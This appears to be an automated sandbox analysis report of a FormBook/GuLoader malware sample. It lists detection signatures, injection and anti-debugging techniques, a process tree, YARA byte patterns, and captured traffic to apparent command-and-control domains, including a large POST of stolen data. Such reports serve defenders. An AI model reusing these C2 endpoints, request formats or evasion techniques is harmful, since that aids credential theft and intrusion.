Loading ...

Play interactive tourEdit tour

Analysis Report sample.exe

Overview

General Information

Sample Name:sample.exe
MD5:178d06da82a097ab37a7423726fb2819
SHA1:31540af8d936241bd20d41599e17c80090906e2d
SHA256:59b75c1a0a646cabb9c69e981dc95985d9feb3ee1e3f7c3c0ace8165037ed006

Most interesting Screenshot:

Detection

FormBook GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Potential malicious icon found
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Contains functionality to hide a thread from the debugger
Creates autostart registry keys with suspicious values (likely registry only malware)
Creates multiple autostart registry keys
Hides threads from debuggers
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to resolve many domain names, but no domain seems valid
Tries to steal Mail credentials (via file access)
Adds / modifies Windows certificates
Antivirus or Machine Learning detection for unpacked file
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches the installation path of Mozilla Firefox
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7
  • sample.exe (PID: 3772 cmdline: 'C:\Users\user\Desktop\sample.exe' MD5: 178D06DA82A097AB37A7423726FB2819)
    • sample.exe (PID: 3820 cmdline: 'C:\Users\user\Desktop\sample.exe' MD5: 178D06DA82A097AB37A7423726FB2819)
      • Dynamitbom9.exe (PID: 3848 cmdline: 'C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe' MD5: 178D06DA82A097AB37A7423726FB2819)
        • Dynamitbom9.exe (PID: 3860 cmdline: 'C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe' MD5: 178D06DA82A097AB37A7423726FB2819)
          • explorer.exe (PID: 1216 cmdline: MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
            • wscript.exe (PID: 3992 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.vbs' MD5: 979D74799EA6C8B8167869A68DF5204A)
              • Dynamitbom9.exe (PID: 4016 cmdline: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe MD5: 178D06DA82A097AB37A7423726FB2819)
                • Dynamitbom9.exe (PID: 4028 cmdline: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe MD5: 178D06DA82A097AB37A7423726FB2819)
            • mstsc.exe (PID: 1508 cmdline: C:\Windows\System32\mstsc.exe MD5: 4676AAA9DDF52A50C829FEDB4EA81E54)
              • cmd.exe (PID: 2168 cmdline: /c del 'C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
              • firefox.exe (PID: 2460 cmdline: C:\Program Files\Mozilla Firefox\Firefox.exe MD5: 594F91C5985AC402ECD2D7F1376AFFFD)
            • mstsc.exe (PID: 2164 cmdline: C:\Windows\System32\mstsc.exe MD5: 4676AAA9DDF52A50C829FEDB4EA81E54)
            • igfxjjoh.exe (PID: 2564 cmdline: C:\Program Files\Av0hhbt\igfxjjoh.exe MD5: 178D06DA82A097AB37A7423726FB2819)
              • igfxjjoh.exe (PID: 2524 cmdline: C:\Program Files\Av0hhbt\igfxjjoh.exe MD5: 178D06DA82A097AB37A7423726FB2819)
                • Dynamitbom9.exe (PID: 2608 cmdline: 'C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe' MD5: 178D06DA82A097AB37A7423726FB2819)
                  • Dynamitbom9.exe (PID: 2276 cmdline: 'C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe' MD5: 178D06DA82A097AB37A7423726FB2819)
            • igfxjjoh.exe (PID: 2560 cmdline: 'C:\Program Files\Av0hhbt\igfxjjoh.exe' MD5: 178D06DA82A097AB37A7423726FB2819)
              • igfxjjoh.exe (PID: 1548 cmdline: 'C:\Program Files\Av0hhbt\igfxjjoh.exe' MD5: 178D06DA82A097AB37A7423726FB2819)
            • raserver.exe (PID: 2600 cmdline: C:\Windows\System32\raserver.exe MD5: 0842FB9AC27460E2B0107F6B3A872FD5)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.2469359795.01A3D000.00000004.00000001.sdmpLokiBot_Dropper_Packed_R11_Feb18Auto-generated rule - file scan copy.pdf.r11Florian Roth
  • 0x1708:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
00000003.00000000.681534832.0040D000.00000020.00020000.sdmpLokiBot_Dropper_Packed_R11_Feb18Auto-generated rule - file scan copy.pdf.r11Florian Roth
  • 0x1ee0:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
00000018.00000002.1740071374.00060000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000018.00000002.1740071374.00060000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x157b9:$sqlite3step: 68 34 1C 7B E1
    • 0x158cc:$sqlite3step: 68 34 1C 7B E1
    • 0x157e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1590d:$sqlite3text: 68 38 2A 90 C5
    • 0x157fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x15923:$sqlite3blob: 68 53 D8 7F 8C
    00000018.00000002.1740071374.00060000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x7248:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x74b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x12b35:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x12621:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x12c37:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x12daf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x802a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1189c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x89c3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x17ea7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x18eaa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    Click to see the 83 entries

    Sigma Overview

    No Sigma rule has matched

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Antivirus / Scanner detection for submitted sampleShow sources
    Source: sample.exeAvira: detected
    Antivirus detection for dropped fileShow sources
    Source: C:\Program Files\Av0hhbt\igfxjjoh.exeAvira: detection malicious, Label: HEUR/AGEN.1043318
    Source: C:\Program Files\Av0hhbt\igfxjjoh.exeAvira: detection malicious, Label: HEUR/AGEN.1043318
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeAvira: detection malicious, Label: HEUR/AGEN.1043318
    Multi AV Scanner detection for dropped fileShow sources
    Source: C:\Program Files\Av0hhbt\igfxjjoh.exeVirustotal: Detection: 44%Perma Link
    Source: C:\Users\user\AppData\Local\Temp\Av0hhbt\igfxjjoh.exeVirustotal: Detection: 44%Perma Link
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeVirustotal: Detection: 44%Perma Link
    Multi AV Scanner detection for submitted fileShow sources
    Source: sample.exeVirustotal: Detection: 44%Perma Link
    Yara detected FormBookShow sources
    Source: Yara matchFile source: 00000018.00000002.1740071374.00060000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000006.00000002.2473272217.030F0000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000002.812505176.00030000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000009.00000002.839828819.00030000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000016.00000002.1736537733.00030000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000C.00000002.843123358.00180000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000002.813297733.006F0000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000B.00000002.2467957823.01300000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000016.00000002.1740999047.1E280000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000006.00000002.2473955848.03C20000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000010.00000002.1593989873.00060000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000009.00000002.843680618.1DA20000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000B.00000002.2468014555.01330000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000B.00000002.2467062900.00180000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000006.00000000.763632814.0A000000.00000040.00000001.sdmp, type: MEMORY
    Source: 2.2.sample.exe.1350000.0.unpackAvira: Label: TR/Dropper.Gen
    Source: 21.2.igfxjjoh.exe.1530000.0.unpackAvira: Label: TR/Dropper.Gen
    Source: 18.2.igfxjjoh.exe.15c0000.2.unpackAvira: Label: TR/Dropper.Gen

    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4x nop then lea edx, dword ptr [ebp-1Ch]4_2_1EC71E4C
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4x nop then lea edx, dword ptr [ebp-1Ch]9_2_1EB41E4C
    Source: C:\Windows\System32\mstsc.exeCode function: 4x nop then jmp 0166B9BEh11_2_015D45E6
    Source: C:\Windows\System32\mstsc.exeCode function: 4x nop then jmp 015E7098h11_2_015E7072

    Networking:

    barindex
    Tries to resolve many domain names, but no domain seems validShow sources
    Source: unknownDNS traffic detected: query: www.wangrunjs.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: www.fekrforoush.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: www.3-333i000000x01-virus.net replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: www.onenationrescue.info replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: www.hothotshortie.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: www.myaccesscomm.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: www.funuldigital.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: www.talleralbamotors.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: www.bolbjergs.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: www.hot-items-on-the-web.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: www.weifangruanjiankaifa.com replaycode: Name error (3)
    Source: global trafficHTTP traffic detected: GET /la8/?tB=dTsJqfyDncR79ChDcZ7dTVXKjVLU/POLqVYwrsJvBb27JhZOGg1DiQs5qfVZyDNRUwezEA==&8pBXn=3f3DUfw HTTP/1.1Host: www.shxzauto.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
    Source: global trafficHTTP traffic detected: GET /la8/?tB=BCnuU+BrzKZHMhRMQrUb+8TCvCHQh5V6jbGtAJ4/7cjQ+AxSy2ru3Enl57uSRAreLq2AIw==&8pBXn=3f3DUfw HTTP/1.1Host: www.mansiobok3.infoConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
    Source: global trafficHTTP traffic detected: GET /la8/?tB=6jXfCnlmBUyhP3MDei5dHW3QfFih/L7qzkUFbpiiQQ7cTGHkRqoPnobMGZmVRVyeMjEViA==&8pBXn=3f3DUfw HTTP/1.1Host: www.lowbrowpizzaandbeer.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
    Source: Joe Sandbox ViewIP Address: 198.49.23.145 198.49.23.145
    Source: Joe Sandbox ViewIP Address: 198.49.23.145 198.49.23.145
    Source: Joe Sandbox ViewASN Name: unknown unknown
    Source: Joe Sandbox ViewASN Name: unknown unknown
    Source: Joe Sandbox ViewASN Name: unknown unknown
    Source: global trafficHTTP traffic detected: GET /la8/?tB=dTsJqfyDncR79ChDcZ7dTVXKjVLU/POLqVYwrsJvBb27JhZOGg1DiQs5qfVZyDNRUwezEA==&8pBXn=3f3DUfw HTTP/1.1Host: www.shxzauto.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
    Source: global trafficHTTP traffic detected: GET /la8/?tB=BCnuU+BrzKZHMhRMQrUb+8TCvCHQh5V6jbGtAJ4/7cjQ+AxSy2ru3Enl57uSRAreLq2AIw==&8pBXn=3f3DUfw HTTP/1.1Host: www.mansiobok3.infoConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
    Source: global trafficHTTP traffic detected: GET /la8/?tB=6jXfCnlmBUyhP3MDei5dHW3QfFih/L7qzkUFbpiiQQ7cTGHkRqoPnobMGZmVRVyeMjEViA==&8pBXn=3f3DUfw HTTP/1.1Host: www.lowbrowpizzaandbeer.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
    Source: Dynamitbom9.exe, 00000004.00000002.814231250.007A5000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000009.00000002.841077985.0030D000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000016.00000002.1737442063.00364000.00000004.00000020.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
    Source: unknownDNS traffic detected: queries for: onedrive.live.com
    Source: unknownHTTP traffic detected: POST /la8/ HTTP/1.1Host: www.mansiobok3.infoConnection: closeContent-Length: 205480Cache-Control: no-cacheOrigin: http://www.mansiobok3.infoUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.mansiobok3.info/la8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 74 42 3d 4a 67 72 55 4b 5a 68 72 34 4f 35 52 4b 68 56 34 66 4d 31 76 69 72 50 39 68 77 4c 6c 68 6f 78 39 28 64 53 37 42 70 51 42 30 39 54 4d 36 6a 52 33 31 30 4c 6e 73 57 53 55 71 64 44 33 4e 58 37 4e 4b 4b 62 69 64 73 6e 62 45 6c 42 56 4a 68 4d 50 4e 56 51 32 38 46 56 65 61 4e 4c 4e 58 57 41 41 48 42 5a 6f 36 4a 30 4b 6b 72 45 58 39 44 6d 57 61 75 76 4c 42 6d 37 58 65 79 4b 69 67 4f 6f 69 57 69 75 6a 69 38 42 6e 74 56 47 68 34 7a 78 31 4a 39 45 78 35 76 66 4e 37 59 28 42 32 49 47 5a 66 45 39 5f 28 6e 6b 44 33 66 57 61 62 32 44 38 70 6d 35 66 7e 35 41 4e 38 53 66 73 53 43 32 44 78 50 65 79 77 55 49 50 47 67 4e 49 72 6b 56 4d 4c 39 7e 34 48 69 53 32 57 67 61 33 4e 79 35 62 48 66 75 68 52 76 4c 62 31 57 62 70 49 64 6f 67 67 71 6f 76 57 67 44 56 31 6b 59 57 76 6a 57 68 79 75 73 6f 78 4b 69 52 52 4d 70 74 47 32 63 65 6a 61 65 54 64 5a 77 2d 53 69 4e 4c 78 67 4d 70 55 77 63 48 39 52 61 34 4e 39 6c 53 42 36 48 79 52 30 45 48 78 49 52 43 4b 5f 44 61 4b 58 76 70 31 7a 6d 4b 50 31 4a 57 5a 68 41 59 4b 78 34 34 43 44 44 38 73 4a 4d 77 54 4d 65 48 50 55 73 2d 6b 6c 59 76 53 57 50 74 71 45 52 76 68 45 44 39 6d 4e 41 65 73 61 71 44 33 69 7e 76 65 35 4f 6e 39 47 6f 38 44 58 32 46 52 4e 6b 74 7a 46 70 54 58 4e 57 79 58 4c 6a 50 51 2d 42 35 4f 6a 32 77 4a 77 64 39 73 5a 46 6b 49 4c 4a 4f 52 79 56 61 4d 70 5a 44 63 73 46 41 48 37 68 6f 65 78 37 68 78 35 61 71 55 4a 57 46 56 66 78 50 28 37 30 54 64 43 43 42 68 31 49 56 6a 4a 33 33 74 6b 6a 76 39 6f 39 76 46 51 39 67 49 4c 70 70 69 68 54 55 75 48 35 77 56 63 36 6b 6e 38 4d 47 77 42 44 4a 32 6a 69 6c 77 66 75 38 53 33 45 63 49 39 28 63 4f 59 78 42 70 72 47 7a 38 70 57 69 59 77 62 48 7a 44 48 62 64 46 56 7a 69 72 61 46 68 73 6a 71 33 46 77 63 6e 73 35 32 34 33 4c 74 48 49 67 56 7a 44 33 6b 55 76 35 43 57 2d 73 68 50 48 53 64 35 65 4c 55 4d 43 53 57 7e 4b 77 31 79 65 33 36 28 39 57 43 4b 41 67 6e 78 75 4e 5a 6e 68 45 46 6d 78 33 4c 67 7a 4d 34 55 52 45 4b 42 36 4e 33 79 38 77 49 64 6c 62 4a 5a 31 6d 31 5a 42 76 31 33 4d 57 66 41 34 6a 53 4a 62 6b 39 47 5f 70 34 58 4f 6d 35 6a 63 6a 32 78 44 67 53 59 5f 30 50 4c 49 69 52 31 6a 52 68 59 4a 32 36 78 4a 35 31 32 37 31 71 50 64 62 69 55 4a 54 36 62 75 4e 6b 68 36 4c 74 49 71 50 61 4f 4d 52 31 28 57 56 4b 77 79 61 6f 4e 4d 4e 49 65 79 35 77 51 75 50 48 38 45 7a 7a 46 48 47 53 4e 78 6d 58 65 66 47 30 33 66 77 42 75 2d 54 5a 56 68 78 77 6c 79 48 45 64 4b 4d 71 46 34 76 74 64 7a 57 5a 4f 4f 68 78 72 64 4d 39 70 39 7e 4e 6d 52 4b 54 64 30 57 48 5a 49 79 58 35 43 68 2d 32 53 75 41 6c 4a 6c 55 6b 48 31 37 58 6d 48 7a 63 70 49 35 42 35 56 5f 47 2d 38 6c 37 72 79 5a 73 5f 53 76 4a 39 65 78 35
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jun 2020 07:56:10 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 327Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6c 61 38 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /la8/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
    Source: mstsc.exe, 0000000B.00000003.1590897253.02600000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
    Source: mstsc.exe, 0000000B.00000003.1590897253.02600000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
    Source: Dynamitbom9.exe, 00000004.00000002.814231250.007A5000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000009.00000002.841077985.0030D000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000016.00000002.1737442063.00364000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
    Source: Dynamitbom9.exe, 00000004.00000002.814231250.007A5000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000009.00000002.841077985.0030D000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000016.00000002.1737442063.00364000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
    Source: Dynamitbom9.exe, 00000004.00000002.814231250.007A5000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000009.00000002.841077985.0030D000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000016.00000002.1737442063.00364000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
    Source: Dynamitbom9.exe, 00000004.00000002.814167671.00759000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000009.00000002.841077985.0030D000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000016.00000002.1737442063.00364000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: Dynamitbom9.exe, 00000004.00000002.814231250.007A5000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000009.00000002.841077985.0030D000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000016.00000002.1737442063.00364000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
    Source: Dynamitbom9.exe, 00000004.00000002.814231250.007A5000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000009.00000002.841077985.0030D000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000016.00000002.1737442063.00364000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
    Source: mstsc.exe, 0000000B.00000003.1590897253.02600000.00000004.00000001.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
    Source: Dynamitbom9.exe, 00000004.00000002.814231250.007A5000.00000004.00000020.sdmpString found in binary or memory: http://crl.use
    Source: Dynamitbom9.exe, 00000016.00000002.1737442063.00364000.00000004.00000020.sdmpString found in binary or memory: http://crl3.dig
    Source: mstsc.exe, 0000000B.00000003.1590897253.02600000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
    Source: Dynamitbom9.exe, 00000004.00000002.814167671.00759000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000009.00000002.841077985.0030D000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000016.00000002.1740725585.1DAD0000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
    Source: mstsc.exe, 0000000B.00000003.1590897253.02600000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
    Source: mstsc.exe, 0000000B.00000003.1590897253.02600000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
    Source: mstsc.exe, 0000000B.00000003.1590897253.02600000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0B
    Source: Dynamitbom9.exe, 00000004.00000002.814231250.007A5000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000009.00000002.841077985.0030D000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000016.00000002.1737442063.00364000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0
    Source: Dynamitbom9.exe, 00000004.00000002.814231250.007A5000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000009.00000002.841077985.0030D000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000016.00000002.1737442063.00364000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
    Source: Dynamitbom9.exe, 00000004.00000002.814231250.007A5000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000009.00000002.841077985.0030D000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000016.00000002.1737442063.00364000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
    Source: Dynamitbom9.exe, 00000004.00000002.814231250.007A5000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000009.00000002.841077985.0030D000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000016.00000002.1737442063.00364000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
    Source: Dynamitbom9.exe, 00000004.00000002.814231250.007A5000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000009.00000002.841077985.0030D000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000016.00000002.1737442063.00364000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com05
    Source: Dynamitbom9.exe, 00000004.00000002.814167671.00759000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000009.00000002.841077985.0030D000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000016.00000002.1740725585.1DAD0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
    Source: mstsc.exe, 0000000B.00000003.1590897253.02600000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0C
    Source: mstsc.exe, 0000000B.00000003.1590897253.02600000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0N
    Source: Dynamitbom9.exe, 00000004.00000002.814231250.007A5000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000009.00000002.841077985.0030D000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000016.00000002.1737442063.00364000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net03
    Source: Dynamitbom9.exe, 00000004.00000002.814231250.007A5000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000009.00000002.841077985.0030D000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000016.00000002.1737442063.00364000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net0D
    Source: Dynamitbom9.exe, 00000004.00000002.814139088.00743000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000009.00000002.840235487.002DD000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000016.00000002.1740725585.1DAD0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
    Source: mstsc.exe, 0000000B.00000003.1590897253.02600000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.thawte.com0
    Source: mstsc.exe, 0000000B.00000003.1590897253.02600000.00000004.00000001.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
    Source: mstsc.exe, 0000000B.00000003.1590897253.02600000.00000004.00000001.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
    Source: mstsc.exe, 0000000B.00000003.1590897253.02600000.00000004.00000001.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
    Source: explorer.exe, 00000006.00000000.737373238.03A10000.00000008.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
    Source: explorer.exe, 00000006.00000000.711537459.01ED0000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.comPA
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.3-333i000000x01-virus.net
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.3-333i000000x01-virus.net/la8/
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.3-333i000000x01-virus.net/la8/www.onenationrescue.info
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.3-333i000000x01-virus.netReferer:
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.bolbjergs.com
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.bolbjergs.com/la8/
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.bolbjergs.com/la8/www.myaccesscomm.com
